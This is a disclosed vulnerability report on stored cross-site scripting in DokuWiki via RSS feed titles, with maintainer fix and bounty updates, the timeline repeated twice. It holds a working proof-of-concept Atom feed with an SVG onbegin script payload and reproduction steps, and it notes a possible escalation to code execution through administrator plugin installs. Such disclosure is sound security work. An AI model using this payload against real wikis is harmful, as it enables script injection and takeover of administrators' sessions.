Stored cross-site scripting via RSS feed in splitbrain/dokuwiki

Valid

Reported on

May 13th 2023

Description

Due to the improper handling of RSS titles in inc/parser/xhtml.php, a malicious RSS feed can be used to inject arbitrary HTML elements into the page, resulting in cross-site scripting.

inc/parser/xhtml.php line 1292-1294

                } else {
                    $this->doc .= ' '.$item->get_title();
                }

Proof of Concept

<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-US">
    <title type="text">test</title>
    <entry>
        <title type="html"><![CDATA[<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s></animate></svg>]]></title>
    </entry>
</feed>

Steps to reproduce

1. Write the following contents to a page: (This URL contains the PoC above.)

{{rss>https://ry0tak.github.io/8941fbce9a754868b279b57d01dc6ef1cb9c74621b864edeb3d79b5f6a6ec375/poc.xml}}

2. Confirm that alert(document.domain) is executed after saving the page.

Impact

An attacker can execute arbitrary JavaScript on Dokuwiki origin. Since administrators can install plugins, this could result in remote code execution if the administrator opens a page with crafted content.

Occurrences

xhtml.php L1292-L1294

We are processing your report and will contact the splitbrain/dokuwiki team within 24 hours. 7 months ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 7 months ago

We have contacted a member of the splitbrain/dokuwiki team and are waiting to hear back 7 months ago

Andreas Gohr

commented 7 months ago

Maintainer

Thanks for the report. Fix is in progress https://github.com/dokuwiki/dokuwiki/pull/3967

Andreas Gohr validated this vulnerability 7 months ago

RyotaK has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Andreas Gohr marked this as fixed in 2023-04-04a with commit 53df38 7 months ago

Andreas Gohr has been awarded the fix bounty

This vulnerability will not receive a CVE

Andreas Gohr published this vulnerability 7 months ago

xhtml.php#L1292-L1294 has been validated

RyotaK

commented 7 months ago

Researcher

Hi @splitbrain, thank you so much for fixing this issue! Can you please assign a CVE ID for this?

to join this conversation

We are processing your report and will contact the splitbrain/dokuwiki team within 24 hours. 7 months ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 7 months ago

We have contacted a member of the splitbrain/dokuwiki team and are waiting to hear back 7 months ago

Andreas Gohr

commented 7 months ago

Maintainer

Thanks for the report. Fix is in progress https://github.com/dokuwiki/dokuwiki/pull/3967

Andreas Gohr validated this vulnerability 7 months ago

RyotaK has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Andreas Gohr marked this as fixed in 2023-04-04a with commit 53df38 7 months ago

Andreas Gohr has been awarded the fix bounty

This vulnerability will not receive a CVE

Andreas Gohr published this vulnerability 7 months ago

xhtml.php#L1292-L1294 has been validated

RyotaK

commented 7 months ago

Researcher

Hi @splitbrain, thank you so much for fixing this issue! Can you please assign a CVE ID for this?

to join this conversation